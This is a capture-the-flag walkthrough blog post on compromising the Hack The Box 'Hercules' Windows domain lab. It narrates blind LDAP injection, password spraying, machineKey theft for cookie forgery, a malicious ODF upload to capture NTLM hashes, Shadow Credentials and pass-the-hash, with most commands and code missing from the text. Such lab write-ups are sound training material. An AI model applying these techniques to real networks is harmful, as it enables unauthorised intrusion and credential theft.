Welcome to another Hack the Box walkthrough. In this blog post, I have demonstrated how I owned the Hercules machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs.
About the Machine
Hercules is an insane-level Windows Active Directory machine that heavily focuses on advanced AD abuse, certificate services exploitation, and Kerberos delegation attacks. Rather than relying on a single misconfiguration, the machine requires chaining together multiple subtle weaknesses across OU permissions, Shadow Credentials, Active Directory Certificate Services (AD CS), and resource-based constrained delegation (RBCD).
Initial access revolves around understanding delegated rights within Organizational Units, where ownership and GenericAll permissions become the foundation for escalation. From there, the attack path dives deep into modern AD abuse primitives, including Shadow Credentials, certificate template misconfigurations (ESC3 / ESC15), and Enrollment Agent abuse, forcing the attacker to reason carefully about certificate trust relationships and enrollment flows.
The machine further raises the difficulty by introducing disabled accounts, delegated password control, and smartcard-related privileges, requiring precise manipulation of user and computer objects rather than brute-force techniques. Exploitation culminates in abusing S4U2Self / S4U2Proxy via resource-based constrained delegation, allowing full impersonation of the Domain Administrator without ever knowing their password.
Hercules is a technically demanding lab that rewards a strong understanding of Kerberos internals, AD CS abuse, delegation mechanics, and BloodHound-driven attack path analysis. It is an excellent test of real-world Active Directory compromise techniques and is especially well-suited for players aiming to master enterprise-grade Windows domain attacks.
The first step in owning the Hercules machine like I have always done in my previous writeups is to connect my Kali Linux terminal with Hack the Box server. To establish this connection, I ran the following command in the terminal:
Once the connection between my terminal and Hack the Box server has been established, I started the Hercules machine and I was assigned an IP address 10.10.11.91.
Enumeration with Nmap
I started the enumeration phase by running a comprehensive Nmap scan against the target machine to identify open ports, running services, and potential attack surfaces:
The scan results revealed that the target is a Windows Server machine, most likely part of a domain environment based on the number of Active Directory-related services running. The domain name hercules.htb was also clearly indicated in several service banners and SSL certificates.
Recon: Name Resolution and Web Enumeration
The Nmap output made it obvious we’re dealing with an Active Directory domain called hercules.htb and a host named dc.hercules.htb. To make interacting with the HTTPS site straightforward I added both names to my /etc/hosts:
I saved the changes and exited the /etc/hosts configuration screen.
Reading krb5.conf - Kerberos configuration confirms the domain controller
I opened the Kerberos config on my machine to see how the target domain was being resolved locally:
I added the following in the krb5.conf file so as to confirm the exact Kerberos realm (HERCULES.HTB) and pointed it directly to dc.hercules.htb as the KDC/admin server while disabling DNS discovery.
That made our Kerberos enumeration deterministic - we could target the DC directly (or use its IP) with Impacket tools to check for AS-REP and Kerberoastable accounts.
Kerberos User Enumeration with kerbrute
To enumerate valid domain accounts via Kerberos, I ran kerbrute against the domain controller. This tool attempts Kerberos AS-REQs for each username in the supplied wordlist and detects which accounts exist based on the responses (without needing passwords):
If you have difficulties running kerbrute command, you can check my Medium post on how to install Kerbrute here.
Output:
What this means and why it matters
- Username enumeration succeeded.
kerbrutewas able to distinguish between valid and invalid usernames by observing Kerberos responses from the KDC at10.10.11.91. This gives us a reliable list of accounts that actually exist in thehercules.htbdomain. - Multiple admin variants. Seeing
admin,administrator, and several case variants suggests the domain contains common privileged accounts (or legacy/default accounts). Even though Kerberos is generally case-insensitive, the presence of these entries is a strong signal that privileged accounts are present and should be tested carefully. - Service/audit account:
auditoris interesting - it may be a low-privilege role or a service-type account that monitors systems. Such accounts sometimes have weak passwords or specific privileges worth investigating. - Human user:
will.slooks like a real user (first initial + last initial pattern). This often makes for a good target for password-spraying, social engineering, or credential re-use attacks.
KDC revealed multiple valid accounts, notably several admin/administrator variants, an auditor account, and a user will.s. These confirmed usernames give us targets for AS-REP roasting, Kerberoasting, and carefully throttled password spraying.
Generating username permutations for brute-forcing
After some enumeration I needed a larger username list derived from the short names I already had. I ran a one-liner that expands each base name into 26 variants (name.a → name.z) and writes the result back to disk:
What the command does:
-
awk '/^[[:space:]]*$/ {next}Skips blank lines in the original file so you don’t get empty entries.
- gsub(/^[ \t]+|[ \t]+$/,"")Trims leading and trailing spaces or tabs from each line (cleans names like
alice→alice). -
for(i=97;i<=122;i++) printf "%s.%c\n", $0, iFor every cleaned name (
$0) loop from ASCII97to122(lettersa→z) and printname.a,name.b, …name.zon separate lines. -
The
awkoutput is piped tosudo tee /home/boltech/Desktop/HerculesHTB/names.txtwhich writes the generated list to the same path and the> /dev/nullhides the tee output. -
The final
echoprints a confirmation that the file was created.
Result:
The resulting file now contains 26 permutations per original name, e.g. if
names.txt originally had:After the command it will contain:
Web Enumeration
After setting up proper hostname resolution, I navigated to https://hercules.htb to manually inspect the web application. The site appeared static and minimal, and a full review of the visible content, page source, and client-side resources did not reveal anything immediately exploitable.
Since nothing obvious surfaced through manual inspection, I moved on to directory brute-forcing to uncover hidden endpoints.
Directory Fuzzing
To enumerate hidden paths and files, I used DIRB with the default common.txt wordlist:
This approach is useful for identifying forgotten endpoints, legacy routes, or restricted areas not directly linked from the main page.
DIRB quickly revealed several interesting findings:
- Common IIS-style endpoints such as:
/index,/default - Case-insensitive duplicates (
/Index,/Default), consistent with a Windows IIS backend - A redirecting home page:
/home→ HTTP 302 - Most notably, a login page:
/loginand/Login(HTTP 200)
The presence of both lowercase and uppercase variants further confirms that the application is hosted on IIS, where URL casing is not strictly enforced.
Static Content Discovery
DIRB also identified a /content/ directory (and its uppercase variant), which contains standard frontend resources:
/content/css- /content/js
- /content/assets
- /content/vendors
These directories host static files such as stylesheets, JavaScript, and third-party libraries. While nothing immediately exploitable was found here, they confirm the application follows a structured MVC-style layout typical of ASP.NET applications.
Login Functionality Analysis
From directory fuzzing, a login endpoint was identified at:
Initial manual testing confirmed the page is protected by rate limiting. After approximately 10 failed authentication attempts, the application responds with an HTTP 429 - Too Many Requests, temporarily blocking further attempts for roughly 30 seconds. This effectively prevents traditional brute-force and password spraying attacks against the web login.
Because of this restriction, further exploitation required a logic flaw rather than credential guessing.
Authentication Backend Behavior
Intercepting the login request with Burp Suite revealed that the application submits credentials via a POST request to /Login, including a standard ASP.NET anti-CSRF token (__RequestVerificationToken).
More importantly, the application returns distinct error messages depending on backend evaluation:
- “Invalid username.”
- “Login attempt failed.”
This discrepancy strongly suggests that the login process validates the username separately from the password, and that backend directory queries are leaking information through response behavior.
Given the environment (IIS + Active Directory), this indicates the login form is authenticating against an LDAP/Active Directory backend.
LDAP Injection Hypothesis
LDAP authentication commonly relies on a search filter similar to:
If user input is embedded directly into the LDAP filter without proper escaping, it becomes possible to manipulate the filter logic. LDAP filters support wildcards, logical operators, and grouping, making them a frequent target for injection attacks.
The goal here was not to bypass authentication outright, but to extract sensitive directory attributes, specifically the description field of a user object.
Injection Strategy
By injecting a crafted payload into the username field, it is possible to append additional LDAP clauses. Conceptually, the payload attempts to transform the original filter into something like:
If the injected filter evaluates to a valid LDAP object, the application responds with “Login attempt failed”. If it evaluates to no results, the application responds with “Invalid username.” This behavior effectively turns the login endpoint into a boolean oracle.
Encoding Requirements
A raw LDAP payload such as:
failed immediately and returned “Invalid username”, indicating the payload was being sanitized or broken before reaching the LDAP backend.
Further testing showed that double URL-encoding was required. Because IIS / ASP.NET performs intermediate decoding, special characters must be encoded twice (% → %25) so that the final decoded payload reaches LDAP intact.
Example injected payload:
When submitted via Burp Repeater, this payload resulted in:
This confirms that the LDAP filter was successfully evaluated and that the description attribute exists and matched the injected condition.
Exploitation Outcome
With a working injection primitive and a reliable response oracle, the description attribute can now be reconstructed character by character using a prefix-based approach:
- Test whether
descriptionstarts witha, thenb, thenc, etc. - A positive match returns “Login attempt failed”
- A negative match returns “Invalid username”
Despite rate limiting, this method remains viable because it requires controlled, low-frequency requests, not brute force.
Given the context of the challenge, it is highly likely that the description field contains sensitive information, such as credentials or hints intended for lateral movement.
Automating LDAP Description Enumeration
With a working LDAP injection primitive confirmed, the next step was to automate data extraction. Manually probing each character would be slow and error-prone, especially with rate limiting in place, so I wrote a custom Python script (bruteforce.py) to enumerate LDAP description fields programmatically:
The script targets the /Login endpoint and faithfully replicates a legitimate authentication flow:
- It fetches a fresh CSRF token (
__RequestVerificationToken) for every request - Maintains session cookies using
requests.Session() - Submits crafted username payloads while supplying a dummy password
- Uses the application’s response message as a boolean oracle
A response containing “Login attempt failed” indicates that the injected LDAP filter evaluated to a valid object, whereas “Invalid username” means the filter returned no results.
Injection Logic
For each known domain user, the script first checks whether the account has a populated description attribute by injecting:
If this condition evaluates as true, the script then enumerates the value character by character, using a prefix-based approach:
Each request tests whether the description begins with the supplied prefix. A positive match confirms the next character and advances the enumeration.
Because IIS and ASP.NET preprocess requests, the payload is double URL-encoded before submission to ensure the LDAP backend receives the injection intact.
Enumeration Results
Running the script against the previously enumerated domain users produced mostly negative results. For the majority of accounts, the application consistently responded that no description field existed, indicating either empty attributes or restricted visibility.
However, one account immediately stood out:
At this point, the script successfully began reconstructing the description value one character at a time. Each confirmed character produced a positive oracle response, allowing the full string to be recovered incrementally.
The final extracted value was:
Which the script recorded as:
Impact
This confirms that sensitive credentials were stored directly in the LDAP description attribute, a critical security misconfiguration. Despite rate limiting and the absence of brute-force opportunities, the application’s verbose error handling and unsafe LDAP query construction enabled full credential disclosure via blind injection.
At this stage, valid domain credentials have been obtained without ever authenticating successfully through the web application.
Verifying the Harvested Credentials
After extracting what appeared to be valid domain credentials from the LDAP description attribute, the next step was to verify whether these credentials could be used for directory authentication.
To do this, I used NetExec (nxc) to attempt an LDAP bind against the domain controller, explicitly targeting the LDAP service on port 389 and supplying the recovered credentials for johnathan.j.
Since this was the first execution of NetExec on the system, it initialized its workspace and protocol databases before performing the authentication attempt.
LDAP Service Discovery
NetExec successfully identified the target as a Domain Controller belonging to the hercules.htb Active Directory domain:
This confirmed that the LDAP service was reachable and responding as expected, ruling out network-level issues.
Authentication Failure Analysis
Despite LDAP being accessible, the authentication attempt failed with the following error:
This Kerberos error indicates that the supplied credentials failed Kerberos pre-authentication, meaning the password provided for johnathan.j was not accepted by the Key Distribution Center (KDC).
In practice, this suggests one of the following:
- The extracted value is not the actual account password, but rather a hint or temporary value
- The password may have been changed since it was stored in the LDAP
description - The account could be restricted from Kerberos authentication
- Or the credential is intended for a different service, not standard domain login
LDAP Injection via Username Field
Based on earlier Kerberos enumeration, the username johnathan.j was confirmed to exist. However, attempting to log in normally resulted in the generic “Login attempt failed” message, as shown in the screenshot.
At this point, attention shifted to how the backend processed the Username field. The behavior strongly suggested that the application was constructing an LDAP query directly from user input, without proper sanitization.
By injecting a crafted payload that:
- prematurely closes the username filter, and
- appends an LDAP condition such as:
it became possible to test whether any directory object’s description attribute started with a given prefix.
This effectively turned the login page into a boolean oracle for LDAP attribute content.
Kerberos Prep: Time Synchronization
Before attempting to reuse the recovered credential against Kerberos-backed services, the local system clock was synchronized with the domain controller:
Kerberos authentication is highly time-sensitive, and even small clock skews can result in authentication failures. Syncing time ensured that subsequent Kerberos-based attacks would not fail for environmental reasons.
Spraying the Recovered Credential Against Domain Users
After extracting the string change*th1s_p@ssw()rd!! from the LDAP description attribute earlier, the next logical step was to determine which account this credential actually belonged to. Given the wording, it strongly resembled a reused or default password rather than something unique to johnathan.j.
To test this hypothesis, I compiled all previously enumerated domain users into a single file, users.txt, and performed a credential spray against the domain controller using nxc over LDAP:
The goal here was simple:
- reuse the recovered password,
- test it across all known users,
- and continue testing even after a successful authentication.
Interpreting the LDAP Spray Results
Most authentication attempts failed with the following Kerberos error:
This error is significant. It confirms that:
- the username exists in the domain, and
- the password is incorrect for that account.
In other words, the password itself is valid Kerberos input, but it does not match the majority of users - exactly what we would expect during a password spray. However, one result immediately stood out:
This line indicates a successful authentication against the domain controller using Kerberos. Unlike the surrounding failures, no pre-authentication error was returned, confirming that the credentials are valid for the ken.w account.
Authenticated Portal Access & File Download Abuse
Using the recovered credentials (ken.w : change*th1s_p@ssw()rd!!), I successfully authenticated to the Hercules Portal and was redirected to the user dashboard.
In the left-corner of the portal, there were several hyperlinks. One that caught my eye was "Mail" and I decided to open it. I found three messages with header "Site Maintenance", "Important", and "From the Boss".
I then pivoted to the Downloads section from the left-hand navigation menu. This page exposed three downloadable resources tied to internal workflows:
- Form 1 – Registration (user onboarding)
- Form 2 – Applications (application management)
- Form 3 – Feedback (issue reporting)
Given that these downloads were served dynamically, this immediately raised the possibility of insecure file handling.
Intercepting the Download Request
With Burp Suite interception enabled, I clicked Form 1: Registration. The portal issued the following request:
This indicated that the backend was directly consuming a fileName parameter - suggesting a potential path traversal vulnerability.
Path Traversal to Sensitive Configuration
To validate this, I modified the request in Burp Repeater to reference a known sensitive file within ASP.NET applications:
High-Impact Information Disclosure
The leaked configuration file contained highly sensitive cryptographic material, including the application’s <machineKey>:
In ASP.NET environments, the machineKey is used to:
- Encrypt and decrypt authentication cookies
- Validate ViewState
- Protect forms authentication tickets
Exposure of these keys enables cookie forging, session hijacking, and potentially authentication bypass across the entire application.
Preparing a Legacy Authentication Cookie Tooling Environment
With the ASP.NET machineKey values extracted earlier, the next step was to recreate the target’s authentication mechanism locally in order to forge valid legacy authentication cookies. Since the application appeared to be running on an older ASP.NET stack, I needed a way to generate Forms Authentication cookies compatible with legacy ASP.NET.
To do this, I initialized a fresh .NET console project:
This created a minimal .NET 6.0 console application, which would serve as a controlled environment for crafting authentication cookies. The output confirms that the project template was created successfully and that all required dependencies were restored.
Immediately, I moved into the directory LegacyAuthConsole:
Adding Legacy ASP.NET Cookie Compatibility
Modern .NET Core does not natively support legacy ASP.NET Forms Authentication cookies. To bridge this gap, I added the AspNetCore.LegacyAuthCookieCompat NuGet package:
This package is specifically designed to generate and validate legacy ASP.NET authentication cookies using known machineKey values. During installation, NuGet automatically pulled in all required dependencies, including cryptographic and runtime libraries necessary for cross-platform compatibility.
Although the output is verbose, the key takeaway is that the package was installed successfully and the project now supports:
- Legacy Forms Authentication ticket creation
- Cookie encryption and signing using extracted
machineKeyvalues - Compatibility with older ASP.NET authentication logic used by the target application
Forging a Legacy ASP.NET Authentication Cookie
With the machineKey values successfully extracted from web.config, the next objective was to forge a valid ASP.NET Forms Authentication cookie. Since the application relied on legacy FormsAuth rather than modern authentication mechanisms, this opened the door to a full authentication bypass.
To accomplish this, I created a custom Program.cs file that manually constructs and encrypts a FormsAuthenticationTicket using the leaked cryptographic material.
The code performs the following steps:
-
Reuse the application’s cryptographic secretsThe
validationKeyanddecryptionKeywere copied directly fromweb.config. These keys are responsible for signing (HMAC-SHA256) and encrypting (AES) Forms Authentication cookies. -
Normalize the validation keyASP.NET truncates validation keys when using
HMACSHA256. To ensure byte-perfect compatibility with the target application, the validation key is trimmed to the expected length before use. -
Recreate a privileged authentication ticketA
FormsAuthenticationTicketwas generated for the userweb_admin, assigning it: • A valid issue and expiry timestamp • A non-persistent session • CustomuserDataset toWeb Administrators, matching the expected role format -
Encrypt and sign the ticketUsing
LegacyFormsAuthenticationTicketEncryptor, the ticket was encrypted and signed exactly as the target server would do internally.
After restoring dependencies and building the project, the application was executed locally. The output was a long hexadecimal string - a fully valid, server-trusted Forms Authentication cookie:
Why This Works
ASP.NET Forms Authentication relies entirely on the secrecy of the machineKey. Since both the encryption and validation keys were exposed, the server has no way to distinguish between a legitimately issued cookie and one forged offline.
At this point, authentication is effectively broken:
- No credentials are required
- No password guessing is involved
- Privileged access is achieved purely through cryptographic abuse
The generated cookie can now be injected into the browser session, granting instant access as web_admin and allowing further privilege escalation within the application.
Pivoting to Admin Functionality via Forged Cookie
Back in the Hercules Portal, I clicked the Forms section and noticed the application exposes a file upload feature. At this point, the earlier machineKey disclosure became a full authentication break: by injecting the forged FormsAuth cookie into the browser’s session storage, the portal immediately treated my session as the higher-privileged user web_admin.
The UI confirmed the privilege change right away - the displayed username switched from ken.w to web_admin, proving the server accepted the cookie as legitimate and granted admin-level access without needing a password.
Weaponizing the Upload: Forcing Outbound Authentication
With admin access and an upload workflow available, the next goal was to turn that feature into a credential capture primitive.
In many Windows environments, when a server (or a user reviewing a submission) opens a document that references an external network resource, Windows may automatically attempt to authenticate to that resource using NTLM. If we control the destination, we can capture the resulting NetNTLMv2 challenge-response.
So instead of uploading a normal document, I generated a specially crafted ODF/ODT file designed to trigger a background request to my attacker host.
Crafting a Malicious ODF to Trigger NTLM Authentication
With admin access to the portal and a file upload feature available, the next move was to generate a document that would force the target environment to reach out to my machine and attempt Windows authentication. The goal here is to capture a NetNTLMv2 challenge-response, which can later be cracked offline or used in follow-on attacks.
To keep everything clean, I built the payload generator inside an isolated Python virtual environment.
Setting Up the Tooling Environment
I first created and activated a virtual environment:
Then I created a working directory and installed the two dependencies required by the Bad-ODF generator:
The output shows ezodf was built successfully and both ezodf and lxml were installed without issues.
Fetching and Running the Bad-ODF Generator
Next, I pulled the generator script directly from GitHub:
With the script downloaded, I ran it:
A small SyntaxWarning about an escape sequence appeared, but it does not impact functionality - Python is simply warning about how ASCII art is printed.
The script then prompted for the listener IP. I provided my VPN interface address:
This value is embedded into the document so that when the file is opened or processed, it attempts to retrieve remote content from my machine - triggering Windows to send an NTLM authentication attempt.
The script then outputs a file (e.g., bad.odt) crafted to reference an attacker-controlled path, so that when the file is processed, Windows attempts NTLM authentication outward.
Abusing the Admin Upload to Trigger NTLM Authentication
With the forged web_admin session cookie in place, I refreshed the portal and confirmed the privilege escalation was successful - the interface now clearly identified me as web_admin. This unlocked functionality that was previously out of reach, most notably the Forms section.
Inside Forms → Report Submission, I found a classic administrative workflow: users can submit reports along with an uploaded file. From an attacker’s perspective, this is a perfect execution point - a backend process is very likely to open, parse, or otherwise handle uploaded documents.
At this stage, the plan was simple:
- I already had a malicious ODF document (
bad.odt) crafted to force outbound authentication. - I had Responder listening on my VPN interface.
- I had admin privileges, meaning fewer restrictions or content checks.
I filled in the required form fields with arbitrary data and selected bad.odt as the uploaded file. Nothing fancy - the payload lives entirely inside the document structure itself.
Once the file was uploaded and submitted, the trap was set.
Capturing the NetNTLMv2 Hash
While the malicious file was uploaded through the portal, I also started a listener on my attack box to catch any outbound authentication attempts.
Once the portal processed the upload, the listener received an NTLM authentication attempt from the target side, resulting in a captured NetNTLMv2 hash.
In practice, this confirms two key things:
- The portal’s upload workflow leads to server-side handling/review (or triggers a process that opens/parses the document).
- That handling path can be abused to force NTLM authentication leakage, turning a simple “upload” feature into a credential capture vector.
Offline Password Cracking
With the hash safely captured, the next step was offline cracking. Since NetNTLMv2 hashes are designed to be crackable with sufficient wordlists, I fed the hash into John the Ripper, using the standard rockyou.txt wordlist:
The result came back almost instantly:
This confirmed valid plaintext credentials for the domain user natalie.a.
Mapping Active Directory with BloodHound
With valid domain credentials in hand (ken.w : change*th1s_p@ssw()rd!!), the next logical step was to enumerate the Active Directory environment and identify possible privilege-escalation or lateral-movement paths. For this, I turned to BloodHound.
I used bloodhound-python to collect a full dataset from the domain:
BloodHound successfully authenticated and obtained a Kerberos TGT, confirming the credentials were valid for domain enumeration. It then connected to the LDAP service on dc.hercules.htb and began harvesting directory data.
From the output, BloodHound identified:
- 1 domain (
hercules.htb) - 1 forest
- 1 computer (the domain controller)
- 49 user accounts
- 62 security groups
- 9 organizational units (OUs)
- 2 Group Policy Objects (GPOs)
- 19 containers
- 0 external trusts
Once LDAP enumeration completed, BloodHound queried the domain controller directly for computer-level information and finalized the dataset.
The entire collection process completed in under a minute and was packaged into a ZIP archive:
With valid domain credentials in hand, the next step was to understand how privilege delegation was structured inside the HERCULES Active Directory environment. Rather than guessing escalation paths, I opted to enumerate and visualize trust relationships using BloodHound.
After collecting the data with bloodhound-python and importing the resulting ZIP file into the BloodHound GUI, the domain’s internal relationships became much clearer.
Key Findings from BloodHound
The BloodHound graph immediately revealed several high-impact misconfigurations:
1. Natalie A. → Web Support
Natalie A. is a member of the Web Support group.
2. Remote Management Group
Both Auditor and Ashley B. are members of Remote Management Users.
These relationships exposed clear privilege escalation paths:
- A compromised Web Support user can directly modify other users via GenericWrite.
- Members of Security Helpdesk can reset passwords for multiple users, potentially escalating to higher-privileged accounts.
- Chained together, these misconfigurations provide a reliable route from a low-privileged foothold to broader domain control.
Instead of blindly attacking services, BloodHound allowed me to prioritize targets based on actual permissions, significantly reducing guesswork and noise.
Requesting a Kerberos TGT (Validating Domain Access)
With valid credentials for natalie.a now confirmed, the next step was to verify whether these credentials were usable for Kerberos-based authentication within the domain. To do this, I requested a Ticket Granting Ticket (TGT) directly from the Domain Controller using Impacket:
The request was sent to the DC at 10.129.242.196, authenticating as hercules.htb\natalie.a with the recovered password. The successful response indicated that the credentials were fully valid and accepted by Kerberos.
Impacket automatically saved the issued TGT to a local credential cache file (natalie.a.ccache). This cache can be reused for Kerberos-aware tools without needing to supply the plaintext password again, enabling pass-the-ticket style attacks and Kerberos-authenticated enumeration or exploitation.
Abusing Shadow Credentials to Impersonate bob.w
After confirming that I had a valid Kerberos ticket for natalie.a, I moved on to abusing Shadow Credentials to impersonate another user. From the earlier BloodHound analysis, I identified that Natalie had sufficient permissions over the bob.w account, making it a viable target for this attack.
To perform the abuse, I reused Natalie’s Kerberos ticket by exporting the credential cache and executed Certipy’s shadow module to automatically inject a malicious Key Credential into Bob’s account:
Certipy generated a certificate and temporarily added a Key Credential to Bob’s msDS-KeyCredentialLink attribute. This allowed me to authenticate as bob.w using certificate-based authentication without knowing his password. I successfully requested a Kerberos Ticket Granting Ticket (TGT) for Bob, which was saved locally as bob.w.ccache.
After authenticating as Bob, I retrieved his NTLM hash and allowed Certipy to restore the original Key Credentials, cleaning up the modification. At this stage, I had fully compromised the bob.w account and obtained reusable credentials for further lateral movement or privilege escalation.
Requesting a Kerberos TGT Using Pass-the-Hash for bob.w
After successfully extracting the NTLM hash for bob.w, I proceeded to verify that the hash was usable for Kerberos authentication. Instead of relying on plaintext credentials, I attempted a pass-the-hash attack to request a Ticket Granting Ticket (TGT) directly from the Domain Controller.
To do this, I used Impacket’s getTGT module and supplied Bob’s NTLM hash while targeting the Domain Controller at 10.129.242.196:
Enumerating Writable Active Directory Objects as bob.w
After successfully obtaining a Kerberos ticket for bob.w, I wanted to understand exactly what level of access this account had within the Active Directory environment. Rather than guessing the next escalation path, I decided to enumerate all directory objects where Bob had write or create permissions, as these often lead directly to privilege escalation opportunities.
Using Bob’s Kerberos ticket cache, I queried Active Directory with bloodyAD to list all writable objects in detail. I ran the following command while explicitly reusing the Kerberos ticket:
The output revealed that bob.w had extensive write permissions across multiple Organizational Units (OUs), groups, and user objects. Most notably, Bob had CREATE_CHILD permissions on several high-value OUs, including the Engineering Department, Security Department, and Web Department. This meant I could create new users, groups, or computers inside these OUs - a powerful primitive for Active Directory abuse.
Beyond OU-level control, I also identified direct WRITE permissions over several user and group objects. This included the ability to modify attributes such as name and cn on multiple users, and more critically, deep write access to the Bob Wood user object itself, including sensitive attributes like msDS-AllowedToActOnBehalfOfOtherIdentity, certificate-related attributes, and login metadata.
The presence of write access over security-sensitive attributes strongly indicated multiple viable escalation paths, including delegation abuse, certificate-based attacks, or account manipulation. At this stage, I had confirmed that compromising bob.w was not a dead end - it provided broad control over key directory objects and opened the door to domain-level privilege escalation.
Installing PowerView.py for Further AD Enumeration
After confirming that I had meaningful write access in Active Directory as bob.w, I wanted a flexible way to perform deeper LDAP-based enumeration and quickly query ACLs, groups, and object attributes from the command line. For that, I decided to install PowerView.py, a Python reimplementation of PowerView-style AD recon.
To keep my system clean and avoid dependency conflicts, I first created and activated a dedicated virtual environment:
With the environment active, I installed PowerView.py directly from its GitHub repository so I could use the latest version and its bundled AD tooling:
The output shows pip cloning the repository, resolving it to a specific commit, and pulling in the dependencies required for Active Directory interaction. This includes libraries such as ldap3 and impacket for LDAP/Kerberos/SMB support, plus additional packages used for parsing, formatting, and authentication workflows.
Once installation completed successfully, my PowerView environment was ready. At this stage, I had a reliable toolkit to enumerate AD objects and permissions interactively, which I could use to validate BloodHound findings and identify the cleanest escalation path based on ACL abuse.










































































































2 Comments
hey buddy will be great if you can drop eloquia
ReplyDeleteThis comment has been removed by the author.
Delete